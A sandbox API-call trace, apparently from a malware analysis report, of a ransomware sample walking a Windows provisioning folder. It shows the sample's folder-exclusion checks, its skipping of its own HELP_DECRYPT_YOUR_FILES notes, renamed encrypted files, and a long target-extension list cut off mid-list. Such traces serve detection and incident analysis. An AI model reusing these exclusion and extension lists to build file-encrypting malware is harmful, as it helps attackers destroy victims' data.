	[0173.274] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x80c6f377, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x80ce9a7b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0173.274] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*") returned 84
	[0173.274] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.274] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", cchLength=0x54 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*") returned 0x54
	[0173.275] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.275] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="windows") returned 0x0
	[0173.275] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.275] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="boot") returned 0x0
	[0173.275] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.275] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="system volume information") returned 0x0
	[0173.275] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.276] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0173.276] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.276] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="temp") returned 0x0
	[0173.276] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.276] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="program files") returned 0x0
	[0173.276] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.277] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0173.277] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.277] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="appdata") returned 0x0
	[0173.277] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.277] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="application data") returned 0x0
	[0173.277] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.277] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="winnt") returned 0x0
	[0173.277] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.278] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="tmp") returned 0x0
	[0173.278] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.278] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="cache") returned 0x0
	[0173.278] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.291] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0173.291] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.291] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="webcache") returned 0x0
	[0173.291] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.291] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="inetcache") returned 0x0
	[0173.291] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.292] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="nvidia") returned 0x0
	[0173.292] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.292] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="packages") returned 0x0
	[0173.292] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.292] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="cookies") returned 0x0
	[0173.292] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.293] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpSrch="programdata") returned 0x0
	[0173.293] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0173.293] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0173.293] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x80c6f377, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x80ce9a7b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0173.293] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0173.293] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80c22e5d, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x80c22e5d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x80c22e5d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x370, dwReserved0=0x0, dwReserved1=0x0, cFileName="customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="CUSTOM~1.SCL")) returned 1
	[0173.293] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ce9a7b, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x80ce9a7b, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x80ce9a7b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0173.293] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80c6f377, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x80c6f377, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x80ce9a7b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0173.293] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80c6f377, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x80c6f377, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x80c6f377, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="MASTER~1.SCL")) returned 1
	[0173.293] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 1
	[0173.294] lstrcmpW (lpString1="Prov", lpString2="..") returned 1
	[0173.295] lstrcmpW (lpString1="Prov", lpString2=".") returned 1
	[0173.295] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}"
	[0173.295] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\"
	[0173.295] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\", lpString2="Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov"
	[0173.295] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov"
	[0173.295] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\"
	[0173.295] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\"
	[0173.295] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\*.*"
	[0173.296] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640034, dwReserved1=0x7d0066, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0173.296] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\*.*") returned 89
	[0173.296] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.296] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*") returned 0x59
	[0173.297] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.297] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="windows") returned 0x0
	[0173.297] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.297] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="boot") returned 0x0
	[0173.297] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.297] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="system volume information") returned 0x0
	[0173.297] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.298] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0173.298] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.298] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="temp") returned 0x0
	[0173.298] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.298] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="program files") returned 0x0
	[0173.298] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.298] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="program files (x86)") returned 0x0
	[0173.299] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.299] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="appdata") returned 0x0
	[0173.299] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.299] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="application data") returned 0x0
	[0173.299] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.299] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="winnt") returned 0x0
	[0173.299] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.300] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="tmp") returned 0x0
	[0173.300] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.300] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="cache") returned 0x0
	[0173.300] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.300] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="temporary internet files") returned 0x0
	[0173.300] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.300] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="webcache") returned 0x0
	[0173.301] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.301] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="inetcache") returned 0x0
	[0173.301] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.301] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="nvidia") returned 0x0
	[0173.301] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.301] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="packages") returned 0x0
	[0173.301] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.302] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="cookies") returned 0x0
	[0173.302] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.302] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\*.*", lpSrch="programdata") returned 0x0
	[0173.302] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640034, dwReserved1=0x7d0066, cFileName="..", cAlternateFileName="")) returned 1
	[0173.302] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640034, dwReserved1=0x7d0066, cFileName="RunTime", cAlternateFileName="")) returned 1
	[0173.302] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1646620, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1646620, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1646620, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xcb, dwReserved0=0x640034, dwReserved1=0x7d0066, cFileName="RunTime.xml", cAlternateFileName="")) returned 1
	[0173.302] lstrcmpW (lpString1="RunTime.xml", lpString2="..") returned 1
	[0173.302] lstrcmpW (lpString1="RunTime.xml", lpString2=".") returned 1
	[0173.303] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\"
	[0173.303] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\", lpString2="RunTime.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml"
	[0173.303] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml") returned 97
	[0173.303] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.303] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml") returned 0x61
	[0173.303] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.304] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0173.304] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml"
	[0173.304] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml") returned 97
	[0173.304] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.304] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.304] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0173.305] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.305] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.